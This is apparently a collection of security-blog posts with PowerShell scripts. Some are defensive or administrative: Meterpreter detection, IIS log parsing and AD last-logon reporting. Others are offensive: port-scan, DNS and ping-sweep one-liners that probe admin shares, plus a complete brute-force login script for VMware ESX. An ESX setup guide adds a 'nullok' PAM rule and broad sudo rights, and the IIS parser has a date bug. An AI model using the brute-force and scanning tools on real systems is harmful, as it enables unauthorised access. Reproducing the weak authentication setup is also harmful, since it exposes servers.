All registry keys have a value associated with called the Last Write Time. This is analogous to the last modification time for a file. When ever the registry key or one if its values has been created, modified, or deleted the value is updated to the current local system time. Unfortunately, there is no Last Write Time associated with a registry value, but it can be infered from the Last Write Time of the key.

Here is a PowerShell script to read the Last Write Time for a registry key.

Usage:

Get-RegKeyLastWriteTime.ps1 <Key> <SubKey>

Example:

Get-RegKeyLastWriteTime.ps1 HKLM SOFTWARE\Microsoft\Windows\CurrentVersion

Output:

Key                         LastWriteTime
—-                         ——————-
AdminDebug                  10/28/2009 7:50:51 PM
App Management              7/14/2009 4:41:12 AM
App Paths                   1/22/2010 2:07:18 PM
Applets                     7/14/2009 4:41:12 AM
Audio                       7/14/2009 4:41:12 AM
Authentication              7/14/2009 4:41:12 AM
BitLocker                   7/14/2009 4:41:12 AM
...

 

Get-RegKeyLastWriteTime.ps1 Script:

param (	[string] $Key, [string] $SubKey )

switch ($Key) {
    "HKCR" { $searchKey = 0x80000000} #HK Classes Root
    "HKCU" { $searchKey = 0x80000001} #HK Current User
    "HKLM" { $searchKey = 0x80000002} #HK Local Machine
    "HKU"  { $searchKey = 0x80000003} #HK Users
    "HKCC" { $searchKey = 0x80000005} #HK Current Config
    default { 
        #throw "Invalid Key. Use one of the following options HKCR, HKCU, HKLM, HKU, HKCC"
    }
}


$KEYQUERYVALUE = 0x1
$KEYREAD = 0x19
$KEYALLACCESS = 0x3F

$sig1 = @'
[DllImport("advapi32.dll", CharSet = CharSet.Auto)]
  public static extern int RegOpenKeyEx(
    int hKey,
    string subKey,
    int ulOptions,
    int samDesired,
    out int hkResult);
'@
$type1 = Add-Type -MemberDefinition $sig1 -Name Win32Utils `
    -Namespace RegOpenKeyEx -Using System.Text -PassThru

$sig2 = @'
[DllImport("advapi32.dll", EntryPoint = "RegEnumKeyEx")]
extern public static int RegEnumKeyEx(
    int hkey,
    int index,
    StringBuilder lpName,
    ref int lpcbName,
    int reserved,
    int lpClass,
    int lpcbClass,
    out long lpftLastWriteTime);
'@
$type2 = Add-Type -MemberDefinition $sig2 -Name Win32Utils `
    -Namespace RegEnumKeyEx -Using System.Text -PassThru

$sig3 = @'
[DllImport("advapi32.dll", SetLastError=true)]
public static extern int RegCloseKey(
    int hKey);
'@
$type3 = Add-Type -MemberDefinition $sig3 -Name Win32Utils `
    -Namespace RegCloseKey -Using System.Text -PassThru


$hKey = new-object int
$result = $type1::RegOpenKeyEx($searchKey, $SubKey, 0, $KEYREAD, [ref] $hKey)

#initialize variables
$builder = New-Object System.Text.StringBuilder 1024
$index = 0
$length = [int] 1024
$time = New-Object Long

#234 means more info, 0 means success. Either way, keep reading
while ( 0,234 -contains $type2::RegEnumKeyEx($hKey, $index++, `
    $builder, [ref] $length, $null, $null, $null, [ref] $time) )
{
    #create output object
    $o = "" | Select Key, LastWriteTime
    $o.Key = $builder.ToString()
    $o.LastWriteTime = (Get-Date $time).AddYears(1600)
    $o

    #reinitialize for next time through the loop  
    $length = [int] 1024
    $builder = New-Object System.Text.StringBuilder 1024
}

$result = $type3::RegCloseKey($hKey);

        

In our recent post on the Command Line Kung Fu blog, Advanced Process Whack-a-Mole, we tried to find meterpreter using these two commands:

Windows command line:

C:\> tasklist /FI "modules eq metsrv.dll"

PowerShell

PS C:\> Get-Process | ? { $_.Modules -like "*(metsrv.dll)*" }

In version MetaSploit 3.3, and presumably future versions, the metsrv.dll is not visible due to Reflective DLL injection. It does work on v2 and v3.0-3.2. However, there are still footprints of meterpreter in v3.3. Two other dll's are loaded with meterpreter that many processes don't load.

C:\WINDOWS\system32\rsaenh.dll
C:\WINDOWS\system32\IPHLPAPI.DLL

We can look for processes that have these two dll's loaded using either of these two commands.

Windows command line:

C:\> tasklist /fi "MODULES eq rsaenh.dll" /fi "MODULES eq iphlpapi.dll"

PowerShell

PS C:\> Get-Process | ? { $_.Modules -like "*(rsaenh.dll)*" 
  -and $_.Modules -like "*(iphlpapi.dll)*"}

The problem is, some processes load these dll's so it isn't a 100% sign of pwnage. The processes include:

explorer.exe
iexplore.exe
lsass.exe
svchost.exe
winlogon.exe

If IE were compromised it wouldn't be obvious, but it is obvious if Icecast was.

PS C:\> Get-Process | ? { $_.Modules -like "*(rsaenh.dll)*" 
  -and $_.Modules -like "*(iphlpapi.dll)*"} | select ProcessName

ProcessName
—————-
explorer
Icecast2
IEXPLORE
lsass
svchost
svchost
svchost
winlogon

It is also apparent if meterpreter has been migrated to a process that doesn't normally load the dll's. In my testing I migrated to calc. Here are the results now.

PS C:\> Get-Process | ? { $_.Modules -like "*(rsaenh.dll)*" 
  -and $_.Modules -like "*(iphlpapi.dll)*"} | select ProcessName

ProcessName
—————-
calc
explorer
Icecast2
IEXPLORE
lsass
svchost
svchost
svchost
winlogon

If we had a baseline of processes that load these dll's then we can use PowerShell to filter out processes that don't normally load the dll's.

PS C:\> Get-Process | ? { $_.Modules -like "*(rsaenh.dll)*" 
  -and $_.Modules -like "*(iphlpapi.dll)*" -and 
  "explorer","iexplore","lsass","svchost","winlogon" -notcontains  $_.ProcessName }

ProcessName
—————-
calc
Icecast2

In this example Icecast2 was the initial point of compromise and meterpreter has migrated to calc.

While this isn't a perfect way to find meterpreter it is better than nothing.

UPDATE:
According to Stephen Fewer, one of the MetaSploit developers:
iphlpapi.dll is imported by the meterpreters stdapi extension for the route and ipconfig commands.

rsaenh.dll (The Microsoft Enhanced Cryptographic Provider DLL) is being loaded via advapi32.dll after a call from the openssl subsystem within meterpreter calling advapi32!CryptAcquireContext[1]

        

This script will read the W3C Extended Log File Format with the default logging options. If you add or remove columns from your log then you will have to modify this script.

################################################################
# Description: IIS Log Importer
# Version: 1.0
# Author: Tim Medin
# Email: TimMedin A@T securitywhole D.O.T com
# Note: This script will read the W3C Extended Log File Format
# with the default logging options. If you add or remove columns
# from your log then you will have to modify this script.
################################################################

param (
  [string] $Path
)

[regex]$regex = '\s*(?<date>\S+)\s+(?<time>\S+)\s+(?<sitename>\S+)\s+(?<computername>\S+)\s+(?<ip>\S+)\s+(?<method>\S+)\s+(?<uristem>\S+)\s+(?<uriquery>\S+)\s+(?<port>\S+)\s+(?<username>\S+)\s+(?<sourceip>\S+)\s+(?<UserAgent>\S+)\s+(?<status>\S+)\s+(?<substatus>\S+)\s+(?<win32status>\S*)'

Get-Content $Path | Select-String -Pattern "^[^#]" | % {
  if ($_ -match $regex) {
    $log = "" | Select TimeStamp, SiteName, ComputerName, IP, Method, UriStem, UriQuery, Port, Username, SourceIp, UserAgent, Status, SubStatus, Win32Status
    $log.TimeStamp = Get-Date "$($matches.Time) $($matches.Time)"
    $log.Sitename = $matches.Sitename
    $log.Computername = $matches.Computername
    $log.Ip = $matches.Ip
    $log.Method = $matches.Method
    $log.UriStem = $matches.UriStem
    $log.UriQuery = $matches.UriQuery
    $log.Port = $matches.Port
    $log.Username = $matches.Username
    $log.SourceIp = $matches.SourceIp
    $log.UserAgent = $matches.UserAgent
    $log.Status = $matches.Status
    $log.SubStatus = $matches.SubStatus
    $log.Win32Status = $matches.Win32Status
    $log
  }
}

        

Ed Skoudis used the for loop to create an ftp script for the ftp command in order to do a port scan. I did an modification to it so that it didn't require the script file and no files were written to the file system. You can find that posting here:
http://blog.securitywhole.com/2009/02/28/ftp-port-scanning.aspx

In my quest to port the Kung Fu of Mr. Skoudis in to powershell I came up with this command:

1..1024 | % { echo ((new-object Net.Sockets.TcpClient).Connect("10.10.10.10",$_)) "$_ is open" } 2>out-null

If you have been following the previous entries there isn't anything fancy here, except one handy little trick that has to do with the output from the echo command. If you look closely you see that the command attempts to write the output of the connection as well as the string at the end. If the first portion throws an error, then the second part isn't output. Here is a simple example with the output.

PS C:\> echo (1+1) (2+2)
2
4

If we replace the (1+1) with (1/0) then nothing is displayed (other than the error). . If we discard the error with 2>Out-Null then there is no output.

PS C:\> echo (1/0) (2+2) 2>Out-Null
(No Output)

We can use this to our advantage. If our connection fails, an error is raised and we don't output the "$_ is open" portion. If the connection works then the "$_ is open" is displayed.

Unfortunately, there is no easy way to change the connection timeout so this process is slow. We can do it with asynchronous calls, but that is a lot of work and is no longer a one liner. I'll put that in a future version.

        

Stealing two other commands from Mr. Skoudis we can do an nslookup of each host in a range.

for /L %i in (1,1,255) do @echo 10.10.10.%i: & @nslookup 10.10.10.%i 2>nul | find "Name"
10.10.10.1
10.10.10.2
10.10.10.3
Name:    server.blah.com
10.10.10.4

for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i
Name:    server.blah.com
10.10.10.3

The first command shows each IP as it is looked up. The second only shows those that successfully resolve.

Here is the powershell version and it's output:

1..255 | % { [System.Net.Dns]::GetHostByAddress("10.10.10.$_") } 2> Out-Null | Format-List
HostName    : server.blah.com
Aliases     : {loadbalancer.blah.com, service.blah.com, service2.blah.com, service3.blah.com}
AddressList : {10.10.10.3}

You'll notice a big difference from the first output. The standard nslookup just returns one result, while the powershell version gets all the aliases. We may not have ever known about those other DNS entries otherwise.

Using the [System.Net.Dns]::GetHostByAddress() method gives us more power, plus we can send the objects we want down the pipeline for further actions. We use the 2> Out-Null so that the error messages for the unresolvable IP addresses aren't shown.

        

Ed Skoudis came up with some fantastic Command Line Kung Fu for Windows to do some basic scanning. Powershell is becoming more and more common so I decided to port these commands to powershell. I think Ed would agree that the standard windows commands can be rather painful and aren't easily extensible (blasted windows) and I hoped to make it slightly less agonizing. In order to make it easier to understand, I won't use the shortcuts in my examples for the foreach-object cmdlet (%) or where-object cmdlet (?).

The first CLKF I thought I would tackle was the ping sweep. You can check out the great write-up over at the Command Line Kung Fu Blog.
http://blog.commandlinekungfu.com/2009/03/episode-6-command-line-ping-sweeper.html

Taken from the blog, here is the Windows command to do ping sweep at the command line and its associated output:

C:\>for /L %i in (1,1,255) do @ping -n 1 10.10.10.%i | find "Reply"

Reply from 192.168.1.1: bytes=32 time=4ms TTL=64
Reply from 192.168.1.3: bytes=32 time=5ms TTL=64
Reply from 192.168.1.37: bytes=32 time=4ms TTL=64

The above command uses a FOR loop to ping each device and looks for "Reply" in the output. If there is a "Reply" then the host is up (duh).

Here is the powershell version and its output:

PS C:\>1..255 | foreach-object { (new-object System.Net.Networkinformation.Ping).Send("10.10.10.$_") } | where-object {$_.Status -eq "success"} | select Address

Address
———-
10.10.10.1
10.10.10.3
10.10.10.37

At first glance the results are very similar and you would think, "Why all the extra typing? The second command is 2.5 times longer!" The big difference between the standard windows command line and powershell is that the latter uses objects, which gives a lot of power...in our shell. Not let's see how it works...

In the above command the range operator (..) generates a list of the numbers 1 through 255. The cool thing is you don't have to use just a single range, you can string them together like this (1..5),7,(9..10) which would give you the numbers 1-10 skipping 6 and 8.

foreach-object { (new-object System.Net.Networkinformation.Ping).Send("10.10.10.$_") }

The foreach-object takes the numbers fed into the pipeline and operates on them one at a time. First, it creates a new ping object and then calls the send method. The parameter given to the send method is a string concatenation of 10.10.10. and the number from $_, which is the "current pipeline object." The $_ variable in our example will contain the numbers 1-255.

where-object {$_.Status -eq "success"}

The output of the send method is the PingReply object which contains a status. We can filter the results only successful pings reply objects will be sent further down the pipeline.

Select Address

Finally, all we care about is the address so that is the only piece we have displayed.

Now that we know how it works, let's pimp out our powershell version.

First, we don't have to just use a contiguous set of numbers. If we wanted to scan all ip address before 10.10.10.100, after 10.10.10.200 and 10.10.10.155 we could use this:

(1..99),(200..255),155 | foreach-object ....

We can use the results to feed into other commands. You can ping sweep an entire subnet and have it automatically do an nslookup, attempt to list the contents of the c$ share, and tell you that you are doing a good job (a little positive reinforcement never hurts).

PS C:\>1..255 | foreach-object { (new-object System.Net.Networkinformation.Ping).Send("10.10.10.$_") } | where-object {$_.Status -eq "success"} | foreach-object { nslookup $_; gci "\\$($_.Address)\c$"; echo "Good Job" }

The ping sweep can be sped up by setting a timeout value (in milliseconds). In the example below we set the timeout value to 100ms.

... (new-object System.Net.Networkinformation.Ping).Send("10.10.10.$_", 100) ...

Next time we'll look into using the powershell version of nslookup and the brute force reverse dns lookup.

        

I put this together in order to integrate the login from VMWare into AD.

NTP
To setup the ESX server for AD authentication the following steps need to be taken. NTP needs to be done first so the server has a time close to that of the domain controller. The ntp ports need to be opened via the gui and the deamon needs to be started as well.

Allow the ntp client access through the firewall
In the GUI under the Configuration tab click on Security Profile then click on Properties… on the top right. A Firewall Options window will open.  Click the checkbox next to NTP Client.

Edit the ntp configuration file located at /etc/ntp.conf

Under servers add the same servers the domain uses for ntp (i.e. tock.usno.navy.mil and tick.usno.navy.mil)
Add:
restrict default kod nomodify notrap
delete:
fudge line
server  127.127.1.0 #local clock
e.g.:
restrict default kod nomodify notrap
server tock.usno.navy.mil
server tick.usno.navy.mil

Edit the steptickers file located at /etc/ntp/step-tickers
add the same servers the domain uses for ntp on separate lines
tock.usno.navy.mil
tick.usno.navy.mil

restart the ntp service:
service ntpd restart
 
check to make sure the time update worked (from command line)
ntpdate -q tock.usno.navy.mil
ntpdate -q tick.usno.navy.mil

Active Directory Authentication
Paste these lines into the CLI. The first two lines can be added via the GUI. VIC -> Configuration -> Security Profile -> Properties -> Add activeDirectorKerberos [sic] (NOT Kerberos).
esxcfg-firewall —openPort 88,tcp,out,KerberosClient
esxcfg-firewall —openPort 464,tcp,out,KerberosPasswordChange
esxcfg-auth —enablead —addomain agstar.local —addc mydc.mycdomain.blah
esxcfg-auth —enablekrb5 —krb5realm=agstar.local —krb5kdc=mydc.mycdomain.blah-–krb5adminserver=mydc.mycdomain.blah

Edit the VMWare Authentication deamon config located at /etc/pam.d/vmware-authd and add this line to the top:
auth sufficient /lib/security/pam_unix_auth.so shadow nullok

Prevent users’ password from expiring since that is taken care of in AD.
esxcfg-auth —passmaxdays=-1

Add users using the username found in AD
adduser jdoe
adduser ymomma
adduser bdover

Done

Now don't forgot to add the users to the wheel groups so they can ssh to the box. Also, add them to the sudoers file so they don't have to use su.

        

This script will brute force the connection to ESX. You can either give it a single username or a username file. Similarly, you can either give it a single password or a password file. You also have the ability to define how many jobs will run in parallel.

#———————————————————————————————
#Description: Powershell Simple VMware ESX Login Brute Force Script
#Version: 1.0
#Author: Tim Medin
#Email: TimMedin A@T securitywhole D.O.T com
#———————————————————————————————
#Parameter Declaration
param (
[Parameter(Position=0)]
[string] $Server = $(Read-Host -prompt "Server"),
[Parameter(Mandatory=$false)]
[string] $User,
[Parameter(Mandatory=$false)]
[string] $Password,
[Parameter(Mandatory=$false)]
[string] $UsersFile,
[Parameter(Mandatory=$false)]
[string] $PasswordsFile,
[Parameter(Mandatory=$false)]
[int] $MaxJobs = 10
)

# Function to handle the jobs once they complete
# As the jobs finish (Completed, or Failed) they are handled by this routine
# Each Job has a child job that actually does the work, if that job
# does not have an error then we have found a successful user/pass combo
Function Handle-Jobs {
    Get-Job | Where-Object {$_.State -ne "Running"} | ForEach-Object {
        $job = $_
        if (!$job.ChildJobs[0].Error) {
            # Found one!
            Receive-Job $job -Keep | Out-Null
            # Echo the user/pass combo stored the job name
            echo "Found $($job.Name)"
            #Clean up all the running jobs
            Get-Job | Stop-Job
            Get-Job | Remove-Job
            #quit
            exit
        }
        Remove-Job $job
    }
}

# Make sure we have enough info passed in from the parameters
if (!$User -and !$UsersFile) {
    throw "User or UserFile required."
}
if (!$Password -and !$PasswordsFile) {
    throw "Password or PasswordFile required."
}

# If the UsersFile and a Username are provided then use the UsersFile
# Convert UsersFile or single User into an array so we can use a loop
if ($UsersFile)
{
    $Users = Get-Content $UsersFile
}
else
{
    $Users = @($User)
}

# If the PasswordsFile and aPassword is provided then use the PasswordsFile
# Convert PasswordsFile or single Password into an array so we can use a loop
if ($PasswordsFile)
{
    $Passwords = Get-Content $PasswordsFile
}
else
{
    $Passwords = @($Password)
}

$Passwords | ForEach-Object {
    $pass = $_
    $Users | ForEach-Object {
        $usr = $_
 
        # If too many jobs running then wait for some to complete
        while ((Get-Job).Count -ge $MaxJobs) {
            Handle-Jobs
            Start-Sleep -Seconds 5
        }
 
        # Start the job to attempt the connection
        Start-Job -InitializationScript {Add-PSSnapin VMware.VimAutomation.Core} -ScriptBlock { param($Server, $usr, $pass) Connect-VIServer -Server $Server -Protocol https -User $usr -Password $pass } -Name "User:$usr Pass:$pass" -ArgumentList $Server,$usr,$pass
    }
}

"Everything has been queued, waiting for jobs to complete"

# Wait for the jobs to complete
Do {
    Handle-Jobs
    Start-Sleep -Seconds 5
} while (Get-Job)

        

Here is a version that was 200 times faster in my environment. Depending on the number of domain controllers it could be even faster for you. It does one big query for each domain controller and then compiles the results. The original script took 45 minutes, this version took 13 seconds.

This script returns a list with all users and their last logon date/time. You can then filter by logon's older than a certain date/time, sort, or export it.

$dcs = [System.DirectoryServices.ActiveDirectory.Domain]::getcurrentdomain().DomainControllers | select name

$startdate = get-date('1/1/1601')

$lst = new-Object System.Collections.ArrayList
foreach ($dc in $dcs) {
 $root = [ADSI] "LDAP://$($dc.Name):389"
 $searcher = New-Object System.DirectoryServices.DirectorySearcher $root
 $searcher.filter = "(&(objectCategory=person)(objectClass=user))"
 $searcher.PropertiesToLoad.Add("name") | out-null
 $searcher.PropertiesToLoad.Add("LastLogon") | out-null
 $searcher.PropertiesToLoad.Add("displayName") | out-null
 $searcher.PropertiesToLoad.Add("userAccountControl") | out-null
 $searcher.PropertiesToLoad.Add("canonicalName") | out-null
 $searcher.PropertiesToLoad.Add("title") | out-null
 $searcher.PropertiesToLoad.Add("sAMAccountName") | out-null
 $searcher.PropertiesToLoad.Add("sn") | out-null
 $searcher.PropertiesToLoad.Add("givenName") | out-null
 $results = $searcher.FindAll()

 foreach ($result in $results)
 {

  $user = $result.Properties;
  $usr = $user | select -property @{name="Name"; expression={$_.name}},
          @{name="LastLogon"; expression={$_.lastlogon}},
          @{name="DisplayName"; expression={$_.displayname}},
          @{name="Disabled"; expression={(($_.useraccountcontrol[0]) -band 2) -eq 2}},
          @{name="CanonicalName"; expression={$_.canonicalname}},
          @{name="Title"; expression={$_.title}},
          @{name="sAMAccountName"; expression={$_.samaccountname}},
          @{name="LastName"; expression={$_.sn}},
          @{name="FirstName"; expression={$_.givenname}}

  $lst.Add($usr) | out-null
 }
}

 

$lst | group name | select-object Name,
         @{Expression={ ($_.Group | Measure-Object -property LastLogon -max).Maximum }; Name="LastLogon" },
         @{Expression={ ($_.Group | select-object -first 1).DisplayName}; Name="DisplayName" },
         @{Expression={ ($_.Group | select-object -first 1).CanonicalName}; Name="CanonicalName" },
         @{Expression={ ($_.Group | select-object -first 1).Title}; Name="Title" },
         @{Expression={ ($_.Group | select-object -first 1).sAMAccountName}; Name="sAMAccountName" },
         @{Expression={ ($_.Group | select-object -first 1).LastName}; Name="LastName" },
         @{Expression={ ($_.Group | select-object -first 1).FirstName}; Name="FirstName" },
         @{Expression={ ($_.Group | select-object -first 1).Disabled}; Name="Disabled" } |
     select-object Name, DisplayName, CanonicalName, Title, sAMAccountName, LastName, FirstName, Disabled,
         @{Expression={ $startdate.adddays(($_.LastLogon / (60 * 10000000)) / 1440) }; Name="LastLogon" }

        

Recently I tried to find accounts that haven't been used in a long time. In order to do this I wrote a powershell script to get the last logon time for all accounts in the domain. The problem is, each domain controller contains a different time for the Last Logon depending on which was used as the logon server. In order to get an accurate time we need to get the last logon from each domain controller for each user. This is NOT a fast process. If there are 500 users and 4 domain controllers that is 2000 requests. On top of that some of the domain controllers might be a different location with a slower WAN link which will make it go even slower.

Note: This script requires Quest Software's Active Directory cmdlets. You can download it from here: http://www.quest.com/powershell/activeroles-server.aspx

Assuming you put this script in the file Get-LastLogin.ps1 you can find all accounts that haven't logged in during the past 90 days.